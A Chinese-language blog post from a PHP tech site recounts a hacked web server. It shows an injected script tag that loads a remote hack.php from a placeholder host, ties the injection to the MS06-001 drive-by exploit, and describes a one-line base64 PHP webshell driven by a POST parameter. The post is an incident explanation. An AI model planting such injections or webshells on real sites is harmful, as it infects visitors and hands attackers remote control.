[精讚] [會員登入]
1853

利用 php 木馬作為駭客攻擊的手法

利用 php 木馬作為駭客攻擊的手法

分享此文連結 //n.sfs.tw/12796

分享連結 利用 php 木馬作為駭客攻擊的手法@新精讚
(文章歡迎轉載,務必尊重版權註明連結來源)
2019-10-25 11:34:00 最後編修
2018-10-12 00:50:07 By 張○○
 

自動目錄

有人告訴我他的伺服器被入侵了,被上傳了很多奇怪的檔案,不過百思不得其解的是,入侵的人似乎只做一件事:

修改 index.html 加入

<script src="http://path.to/hack.php"></script>

另一種是加入js:

document.wrtite "<script src="http://path.to/hack.php"></script>";

上面的hack.php只是範例,實際上的檔名可能是很像正常的檔案,例如像 jquery.php

這樣子似乎不能做任何了不起的攻擊,無論 hack.php 寫得多棒,也還只是產生 javascript而已?

不過這樣子只要開啟這個網頁,就能觸發在遠處的駭客程式,做他們想做的事情

2009-11-20

不過今天去參加資安的研習,原來那是利用 Windows MS06-001 的漏洞。當使用者點開網頁之後會去連結該js,將木馬注入其開啟網頁的使用者。對這個有興趣的人可以搜尋「掛馬」

原來在目錄下又發現一個 php,名稱暫且叫 tj.php,內容是這樣:

經過 base64 decode

這是一個一行木馬,如果我用post傳一個 e 的值進去,他就會用 php去執行這個指令。

不過這個 e 值是要base64_encode 過的php指令碼。

因此我寫一個 control.php.把要送的指令包成 encode 傳給這個木馬。

 

駭客就能在遠端輕鬆的逛你的伺服器了。雖然只有 www的權限,也是夠了。

這隻 tj.php 可經由沒寫好的上傳功能或是系統的漏洞上傳到伺服器,駭客再遠端來執行。

實在是真恐怖


原文 2009-10-16 00:39:08

END

你可能感興趣的文章

[Codeingitor4] 使用recaptcha v3前後端認證 為了防止機器人說惡意攻擊,我們引入了 recaptcha,此篇結合 php 框架codeignitor4作前後端認證。

[PHP] 位元運算 (Bitwise operation)及和PERL比較 PHP 的位元運算,及和PERL比較整理

[PHP>7.3] switch中的 Did you mean to use "continue 2"? 除錯 這近更新 PHP到7.3版以後,出現這樣的錯:targeting switch is equivalent to "break". Did you mean to use "continue 2"?解決方法

[CodeIgniter 3] 修改或插入資料時遇到函數的處理 CI3 中要新增或修改的資料中如果有 now()這類的函數,要怎麼處理?

設定Google analytics API #2 -- PHP的程式安裝和撰寫 讓你的網站能夠存取你的Google analytics上面的資料

[PHP] 陣列新增資料及整理 在php陣列加入項目和重新整理陣列的方法

隨機好文

PHP for sphinx 函式庫安裝 PECL/sphinx PHP>= 5.2.2 已經能原生支援 sphinx,可是預設的沒有裝,我們得自己裝才能用

[Windows7] 移除IE10及移除IE11 Windows7 不得已的情況要移除IE11或IE10怎麼做?

一個邏輯的錯誤刪了全部檔案的經驗 今天本來想做一件很簡單的事,但卻足足浪費我多一倍的時間,再加上刪掉我全部的檔案,原因只是因為我自己的邏輯錯誤。

APACHE的記錄檔格式 LogFormat 語法 在APACHE中有定義一些記錄的語法模版 在 /etc/httpd/conf/httpd.conf 中: LogForm

[CodeIgniter 3] 資料庫的使用方法整理2/2 CI3 承襲 CI2,有很多的builder class可以用,依各人的使用習慣,有人喜歡一堆sql字串,有人喜歡用helper